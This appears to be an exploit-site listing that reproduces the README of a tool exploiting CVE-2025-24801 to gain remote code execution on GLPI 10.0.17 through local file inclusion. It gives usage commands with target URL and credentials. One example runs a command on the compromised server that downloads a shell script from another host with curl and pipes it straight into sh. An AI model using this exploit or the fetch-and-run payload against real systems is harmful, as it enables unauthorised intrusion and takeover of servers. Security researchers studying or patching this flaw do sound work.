Exploit for CVE-2025-24801

Name: Exploit for CVE-2025-24801
Rating: 5 (274 reviews)
2025-04-19 | CVSS 8.5
## https://sploitus.com/exploit?id=12C6583F-562E-51C5-B14E-8164EC95C522
# CVE-2025-24801

This exploit uses CVE-2025-24801 to get Remote Code Execution (RCE) via Local File Inclusion (LFI) at GLPI 10.0.17. [Proof of Concept (PoC)](https://blog.lexfo.fr/glpi-sql-to-rce.html) of this CVE with explaination to this vulnerability in GLPI.

## Observation
Some applications expose the `/glpi/` endpoint (e.g., http://172.16.11.130:8080/glpi/front/computer.form.php). If the target application includes this endpoint, it is necessary to add it to the --url parameter (e.g., --url http://172.16.11.130:8080/glpi).

## Usage
Example of usage.
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
```

If you already executed this exploit and triggered RCE, you can use `--cmd ` parameter to just execute the command.
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
```